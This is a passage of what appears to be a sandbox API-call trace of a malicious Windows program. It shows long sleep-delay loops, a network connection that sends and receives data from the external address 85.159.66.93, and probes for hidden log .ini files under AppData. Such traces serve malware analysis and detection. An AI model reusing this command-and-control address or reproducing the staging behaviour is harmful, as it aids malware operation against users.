(dwMilliseconds=0x7d0) [0224.134] Sleep (dwMilliseconds=0x7d0) [0224.136] Sleep (dwMilliseconds=0x7d0) [0224.137] Sleep (dwMilliseconds=0x7d0) [0224.139] Sleep (dwMilliseconds=0x7d0) [0224.140] Sleep (dwMilliseconds=0x7d0) [0224.143] Sleep (dwMilliseconds=0x7d0) [0224.145] Sleep (dwMilliseconds=0x7d0) [0224.147] Sleep (dwMilliseconds=0x7d0) [0224.148] Sleep (dwMilliseconds=0x7d0) [0224.150] Sleep (dwMilliseconds=0x7d0) [0224.151] Sleep (dwMilliseconds=0x7d0) [0224.153] Sleep (dwMilliseconds=0x7d0) [0224.155] Sleep (dwMilliseconds=0x7d0) [0224.157] Sleep (dwMilliseconds=0x7d0) [0224.159] Sleep (dwMilliseconds=0x7d0) [0224.161] Sleep (dwMilliseconds=0x7d0) [0224.162] Sleep (dwMilliseconds=0x7d0) [0224.164] Sleep (dwMilliseconds=0x7d0) [0224.165] Sleep (dwMilliseconds=0x7d0) [0224.167] Sleep (dwMilliseconds=0x7d0) [0224.168] Sleep (dwMilliseconds=0x7d0) [0224.170] Sleep (dwMilliseconds=0x7d0) [0224.171] Sleep (dwMilliseconds=0x7d0) [0224.173] Sleep (dwMilliseconds=0x7d0) [0224.174] Sleep (dwMilliseconds=0x7d0) [0224.176] Sleep (dwMilliseconds=0x7d0) [0224.178] Sleep (dwMilliseconds=0x7d0) [0224.180] Sleep (dwMilliseconds=0x7d0) [0224.181] Sleep (dwMilliseconds=0x7d0) [0224.183] Sleep (dwMilliseconds=0x7d0) [0224.185] Sleep (dwMilliseconds=0x7d0) [0224.187] Sleep (dwMilliseconds=0x7d0) [0224.189] Sleep (dwMilliseconds=0x7d0) [0224.191] Sleep (dwMilliseconds=0x7d0) [0224.192] Sleep (dwMilliseconds=0x7d0) [0224.194] Sleep (dwMilliseconds=0x7d0) [0224.195] Sleep (dwMilliseconds=0x7d0) [0224.197] Sleep (dwMilliseconds=0x7d0) [0224.198] Sleep (dwMilliseconds=0x7d0) [0224.200] Sleep (dwMilliseconds=0x7d0) [0224.202] Sleep (dwMilliseconds=0x7d0) [0224.203] Sleep (dwMilliseconds=0x7d0) [0224.205] Sleep (dwMilliseconds=0x7d0) [0224.206] Sleep (dwMilliseconds=0x7d0) [0224.208] Sleep (dwMilliseconds=0x7d0) [0224.209] Sleep (dwMilliseconds=0x7d0) [0224.211] Sleep (dwMilliseconds=0x7d0) [0224.213] Sleep (dwMilliseconds=0x7d0) [0224.214] Sleep (dwMilliseconds=0x7d0) [0224.216] Sleep (dwMilliseconds=0x7d0) [0224.217] Sleep (dwMilliseconds=0x7d0) [0224.219] Sleep (dwMilliseconds=0x7d0) [0224.221] Sleep (dwMilliseconds=0x7d0) [0224.223] Sleep (dwMilliseconds=0x7d0) [0224.225] Sleep (dwMilliseconds=0x7d0) [0224.226] Sleep (dwMilliseconds=0x7d0) [0224.228] Sleep (dwMilliseconds=0x7d0) [0224.229] Sleep (dwMilliseconds=0x7d0) [0224.231] Sleep (dwMilliseconds=0x7d0) [0224.233] Sleep (dwMilliseconds=0x7d0) [0224.235] Sleep (dwMilliseconds=0x7d0) [0224.236] Sleep (dwMilliseconds=0x7d0) [0224.238] Sleep (dwMilliseconds=0x7d0) [0224.239] Sleep (dwMilliseconds=0x7d0) [0224.241] Sleep (dwMilliseconds=0x7d0) [0224.243] Sleep (dwMilliseconds=0x7d0) [0224.245] Sleep (dwMilliseconds=0x7d0) [0224.246] Sleep (dwMilliseconds=0x7d0) [0224.247] Sleep (dwMilliseconds=0x7d0) [0224.249] Sleep (dwMilliseconds=0x7d0) [0224.250] Sleep (dwMilliseconds=0x7d0) [0224.252] Sleep (dwMilliseconds=0x7d0) [0224.253] Sleep (dwMilliseconds=0x7d0) [0224.255] Sleep (dwMilliseconds=0x7d0) [0224.256] Sleep (dwMilliseconds=0x7d0) [0224.258] Sleep (dwMilliseconds=0x7d0) [0224.259] Sleep (dwMilliseconds=0x7d0) [0224.261] Sleep (dwMilliseconds=0x7d0) [0224.262] Sleep (dwMilliseconds=0x7d0) [0224.265] Sleep (dwMilliseconds=0x7d0) [0224.266] Sleep (dwMilliseconds=0x7d0) [0224.268] Sleep (dwMilliseconds=0x7d0) [0224.269] Sleep (dwMilliseconds=0x7d0) [0224.271] Sleep (dwMilliseconds=0x7d0) [0224.272] Sleep (dwMilliseconds=0x7d0) [0224.277] Sleep (dwMilliseconds=0x7d0) [0224.279] Sleep (dwMilliseconds=0x7d0) [0224.281] Sleep (dwMilliseconds=0x7d0) [0224.282] Sleep (dwMilliseconds=0x7d0) [0224.284] Sleep (dwMilliseconds=0x7d0) [0224.285] Sleep (dwMilliseconds=0x7d0) [0224.287] Sleep (dwMilliseconds=0x7d0) [0224.288] Sleep (dwMilliseconds=0x7d0) [0224.298] Sleep (dwMilliseconds=0x7d0) [0224.304] Sleep (dwMilliseconds=0x7d0) [0224.306] Sleep (dwMilliseconds=0x7d0) [0224.307] Sleep (dwMilliseconds=0x7d0) [0224.315] Sleep (dwMilliseconds=0x7d0) [0224.316] Sleep (dwMilliseconds=0x7d0) [0224.319] Sleep (dwMilliseconds=0x7d0) [0224.324] Sleep (dwMilliseconds=0x7d0) [0224.325] Sleep (dwMilliseconds=0x7d0) [0224.327] Sleep (dwMilliseconds=0x7d0) [0224.328] Sleep (dwMilliseconds=0x7d0) [0224.330] Sleep (dwMilliseconds=0x7d0) [0224.331] Sleep (dwMilliseconds=0x7d0) [0224.336] Sleep (dwMilliseconds=0x7d0) [0224.337] Sleep (dwMilliseconds=0x7d0) [0224.339] Sleep (dwMilliseconds=0x7d0) [0224.342] Sleep (dwMilliseconds=0x7d0) [0224.344] Sleep (dwMilliseconds=0x7d0) [0224.345] Sleep (dwMilliseconds=0x7d0) [0224.346] Sleep (dwMilliseconds=0x7d0) [0224.348] Sleep (dwMilliseconds=0x7d0) [0224.349] Sleep (dwMilliseconds=0x7d0) [0224.351] Sleep (dwMilliseconds=0x7d0) [0224.352] Sleep (dwMilliseconds=0x7d0) [0224.357] Sleep (dwMilliseconds=0x7d0) [0224.359] Sleep (dwMilliseconds=0x7d0) [0224.360] Sleep (dwMilliseconds=0x7d0) [0224.362] Sleep (dwMilliseconds=0x7d0) [0224.364] Sleep (dwMilliseconds=0x7d0) [0224.368] Sleep (dwMilliseconds=0x7d0) [0224.369] Sleep (dwMilliseconds=0x7d0) [0224.371] Sleep (dwMilliseconds=0x7d0) [0224.372] Sleep (dwMilliseconds=0x7d0) [0224.374] Sleep (dwMilliseconds=0x7d0) [0224.375] Sleep (dwMilliseconds=0x7d0) [0224.377] Sleep (dwMilliseconds=0x7d0) [0224.378] Sleep (dwMilliseconds=0x7d0) [0224.380] Sleep (dwMilliseconds=0x7d0) [0224.381] Sleep (dwMilliseconds=0x7d0) [0224.383] Sleep (dwMilliseconds=0x7d0) [0224.384] Sleep (dwMilliseconds=0x7d0) [0224.389] Sleep (dwMilliseconds=0x7d0) [0224.391] Sleep (dwMilliseconds=0x7d0) [0224.392] Sleep (dwMilliseconds=0x7d0) [0224.394] Sleep (dwMilliseconds=0x7d0) [0224.395] Sleep (dwMilliseconds=0x7d0) [0224.400] Sleep (dwMilliseconds=0x7d0) [0224.402] Sleep (dwMilliseconds=0x7d0) [0224.403] Sleep (dwMilliseconds=0x7d0) [0224.405] Sleep (dwMilliseconds=0x7d0) [0224.406] Sleep (dwMilliseconds=0x7d0) [0224.413] Sleep (dwMilliseconds=0x7d0) [0224.414] Sleep (dwMilliseconds=0x7d0) [0224.416] Sleep (dwMilliseconds=0x7d0) [0224.417] Sleep (dwMilliseconds=0x7d0) [0224.419] Sleep (dwMilliseconds=0x7d0) [0224.420] Sleep (dwMilliseconds=0x7d0) [0224.422] Sleep (dwMilliseconds=0x7d0) [0224.423] Sleep (dwMilliseconds=0x7d0) [0224.425] Sleep (dwMilliseconds=0x7d0) [0224.427] Sleep (dwMilliseconds=0x7d0) [0224.428] Sleep (dwMilliseconds=0x7d0) [0224.434] Sleep (dwMilliseconds=0x7d0) [0224.435] Sleep (dwMilliseconds=0x7d0) [0224.437] Sleep (dwMilliseconds=0x7d0) [0224.438] Sleep (dwMilliseconds=0x7d0) [0224.440] Sleep (dwMilliseconds=0x7d0) [0224.445] Sleep (dwMilliseconds=0x7d0) [0224.446] Sleep (dwMilliseconds=0x7d0) [0224.448] Sleep (dwMilliseconds=0x7d0) [0224.449] Sleep (dwMilliseconds=0x7d0) [0224.451] Sleep (dwMilliseconds=0x7d0) [0224.456] Sleep (dwMilliseconds=0x7d0) [0224.457] Sleep (dwMilliseconds=0x7d0) [0224.459] Sleep (dwMilliseconds=0x7d0) [0224.461] Sleep (dwMilliseconds=0x7d0) [0224.463] Sleep (dwMilliseconds=0x7d0) [0224.464] Sleep (dwMilliseconds=0x7d0) [0224.466] Sleep (dwMilliseconds=0x7d0) [0224.468] Sleep (dwMilliseconds=0x7d0) [0224.469] Sleep (dwMilliseconds=0x7d0) [0224.471] Sleep (dwMilliseconds=0x7d0) [0224.473] Sleep (dwMilliseconds=0x7d0) [0224.478] Sleep (dwMilliseconds=0x7d0) [0224.480] Sleep (dwMilliseconds=0x7d0) [0224.482] Sleep (dwMilliseconds=0x7d0) [0224.483] Sleep (dwMilliseconds=0x7d0) [0224.485] Sleep (dwMilliseconds=0x7d0) [0224.489] Sleep (dwMilliseconds=0x7d0) [0224.490] Sleep (dwMilliseconds=0x7d0) [0224.492] Sleep (dwMilliseconds=0x7d0) [0224.493] Sleep (dwMilliseconds=0x7d0) [0224.495] Sleep (dwMilliseconds=0x7d0) [0224.504] Sleep (dwMilliseconds=0x7d0) [0224.505] Sleep (dwMilliseconds=0x7d0) [0224.507] Sleep (dwMilliseconds=0x7d0) [0224.508] Sleep (dwMilliseconds=0x7d0) [0224.510] Sleep (dwMilliseconds=0x7d0) [0224.512] Sleep (dwMilliseconds=0x7d0) [0224.514] Sleep (dwMilliseconds=0x7d0) [0224.535] Sleep (dwMilliseconds=0x7d0) [0224.536] Sleep (dwMilliseconds=0x7d0) [0224.538] Sleep (dwMilliseconds=0x7d0) [0224.539] Sleep (dwMilliseconds=0x7d0) [0224.541] Sleep (dwMilliseconds=0x7d0) [0224.542] Sleep (dwMilliseconds=0x7d0) [0224.544] Sleep (dwMilliseconds=0x7d0) [0224.545] Sleep (dwMilliseconds=0x7d0) [0224.547] Sleep (dwMilliseconds=0x7d0) [0224.548] Sleep (dwMilliseconds=0x7d0) [0224.550] Sleep (dwMilliseconds=0x7d0) [0224.551] Sleep (dwMilliseconds=0x7d0) [0224.553] Sleep (dwMilliseconds=0x7d0) [0224.554] Sleep (dwMilliseconds=0x7d0) [0224.556] Sleep (dwMilliseconds=0x7d0) [0224.557] Sleep (dwMilliseconds=0x7d0) [0224.559] Sleep (dwMilliseconds=0x7d0) [0224.560] Sleep (dwMilliseconds=0x7d0) [0224.562] Sleep (dwMilliseconds=0x7d0) [0224.563] Sleep (dwMilliseconds=0x7d0) [0224.565] Sleep (dwMilliseconds=0x7d0) [0224.566] Sleep (dwMilliseconds=0x7d0) [0224.570] Sleep (dwMilliseconds=0x7d0) [0224.571] Sleep (dwMilliseconds=0x7d0) [0224.573] Sleep (dwMilliseconds=0x7d0) [0224.574] Sleep (dwMilliseconds=0x7d0) [0224.576] Sleep (dwMilliseconds=0x7d0) [0224.577] Sleep (dwMilliseconds=0x7d0) [0224.579] Sleep (dwMilliseconds=0x7d0) [0224.580] Sleep (dwMilliseconds=0x7d0) [0224.582] Sleep (dwMilliseconds=0x7d0) [0224.583] Sleep (dwMilliseconds=0x7d0) [0224.585] Sleep (dwMilliseconds=0x7d0) [0224.586] Sleep (dwMilliseconds=0x7d0) [0224.587] Sleep (dwMilliseconds=0x7d0) [0224.589] Sleep (dwMilliseconds=0x7d0) [0224.591] Sleep (dwMilliseconds=0x7d0) [0224.592] Sleep (dwMilliseconds=0x7d0) [0224.594] Sleep (dwMilliseconds=0x7d0) [0224.595] Sleep (dwMilliseconds=0x7d0) [0224.597] Sleep (dwMilliseconds=0x7d0) [0224.598] Sleep (dwMilliseconds=0x7d0) [0224.600] Sleep (dwMilliseconds=0x7d0) [0224.601] Sleep (dwMilliseconds=0x7d0) [0224.603] Sleep (dwMilliseconds=0x7d0) [0224.604] Sleep (dwMilliseconds=0x7d0) [0224.606] Sleep (dwMilliseconds=0x7d0) [0224.607] Sleep (dwMilliseconds=0x7d0) [0224.609] Sleep (dwMilliseconds=0x7d0) [0224.610] Sleep (dwMilliseconds=0x7d0) [0224.612] Sleep (dwMilliseconds=0x7d0) [0224.614] Sleep (dwMilliseconds=0x7d0) [0224.616] Sleep (dwMilliseconds=0x7d0) [0224.618] Sleep (dwMilliseconds=0x7d0) [0224.619] Sleep (dwMilliseconds=0x7d0) [0224.621] Sleep (dwMilliseconds=0x7d0) [0224.622] Sleep (dwMilliseconds=0x7d0) [0224.624] Sleep (dwMilliseconds=0x7d0) [0224.625] Sleep (dwMilliseconds=0x7d0) [0224.627] Sleep (dwMilliseconds=0x7d0) [0224.629] Sleep (dwMilliseconds=0x7d0) [0224.630] Sleep (dwMilliseconds=0x7d0) [0224.632] Sleep (dwMilliseconds=0x7d0) [0224.633] Sleep (dwMilliseconds=0x7d0) [0224.635] Sleep (dwMilliseconds=0x7d0) [0224.638] Sleep (dwMilliseconds=0x7d0) [0224.640] Sleep (dwMilliseconds=0x7d0) [0224.642] Sleep (dwMilliseconds=0x7d0) [0224.643] Sleep (dwMilliseconds=0x7d0) [0224.645] Sleep (dwMilliseconds=0x7d0) [0224.646] Sleep (dwMilliseconds=0x7d0) [0224.648] Sleep (dwMilliseconds=0x7d0) [0224.649] Sleep (dwMilliseconds=0x7d0) [0224.651] Sleep (dwMilliseconds=0x7d0) [0224.652] Sleep (dwMilliseconds=0x7d0) [0224.654] Sleep (dwMilliseconds=0x7d0) [0224.655] Sleep (dwMilliseconds=0x7d0) [0224.657] Sleep (dwMilliseconds=0x7d0) [0224.658] Sleep (dwMilliseconds=0x7d0) [0224.660] Sleep (dwMilliseconds=0x7d0) [0224.662] Sleep (dwMilliseconds=0x7d0) [0224.663] Sleep (dwMilliseconds=0x7d0) [0224.665] Sleep (dwMilliseconds=0x7d0) [0224.666] Sleep (dwMilliseconds=0x7d0) [0224.668] Sleep (dwMilliseconds=0x7d0) [0224.669] Sleep (dwMilliseconds=0x7d0) [0224.671] Sleep (dwMilliseconds=0x7d0) [0224.672] Sleep (dwMilliseconds=0x7d0) [0224.674] Sleep (dwMilliseconds=0x7d0) [0224.676] Sleep (dwMilliseconds=0x7d0) [0224.678] Sleep (dwMilliseconds=0x7d0) [0224.679] Sleep (dwMilliseconds=0x7d0) [0224.681] Sleep (dwMilliseconds=0x7d0) [0224.682] Sleep (dwMilliseconds=0x7d0) [0224.684] Sleep (dwMilliseconds=0x7d0) [0224.685] Sleep (dwMilliseconds=0x7d0) [0224.687] Sleep (dwMilliseconds=0x7d0) [0224.689] Sleep (dwMilliseconds=0x7d0) [0224.691] Sleep (dwMilliseconds=0x7d0) [0224.697] Sleep (dwMilliseconds=0x7d0) [0224.699] Sleep (dwMilliseconds=0x7d0) [0224.700] Sleep (dwMilliseconds=0x7d0) [0224.702] Sleep (dwMilliseconds=0x7d0) [0224.703] Sleep (dwMilliseconds=0x7d0) [0224.705] Sleep (dwMilliseconds=0x7d0) [0224.706] Sleep (dwMilliseconds=0x7d0) [0224.708] Sleep (dwMilliseconds=0x7d0) [0224.709] Sleep (dwMilliseconds=0x7d0) [0224.712] Sleep (dwMilliseconds=0x7d0) [0224.713] Sleep (dwMilliseconds=0x7d0) [0224.762] Sleep (dwMilliseconds=0x7d0) [0224.836] Sleep (dwMilliseconds=0x7d0) [0224.912] Sleep (dwMilliseconds=0x7d0) [0225.013] Sleep (dwMilliseconds=0x7d0) [0225.160] socket (af=2, type=1, protocol=6) returned 0x1c58 [0225.161] connect (s=0x1c58, name=0x9f91d10*(sa_family=2, sin_port=0x50, sin_addr="85.159.66.93"), namelen=16) returned 0 [0225.240] send (s=0x1c58, buf=0x82e10fa*, len=169, flags=0) returned 169 [0225.240] setsockopt (s=0x1c58, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0225.240] recv (in: s=0x1c58, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 224 [0225.373] closesocket (s=0x1c58) returned 0 [0225.374] Sleep (dwMilliseconds=0x7d0) [0225.375] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.375] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.376] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0225.376] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e068f0) returned 1 [0225.376] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.376] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.376] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0225.376] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e068f0) returned 1 [0225.376] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.376] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.376] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0225.376] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e068f0) returned 1 [0225.376] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.376] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.376] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0225.377] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e068f0) returned 1 [0225.377] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.377] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.377] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0225.377] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e068f0) returned 1 [0225.377] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.377] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.377] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0225.377] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e071f0) returned 1 [0225.377] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.377] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.377] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0225.377] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e068f0) returned 1 [0225.377] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.377] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.377] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0225.378] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07310) returned 1 [0225.378] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.378] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 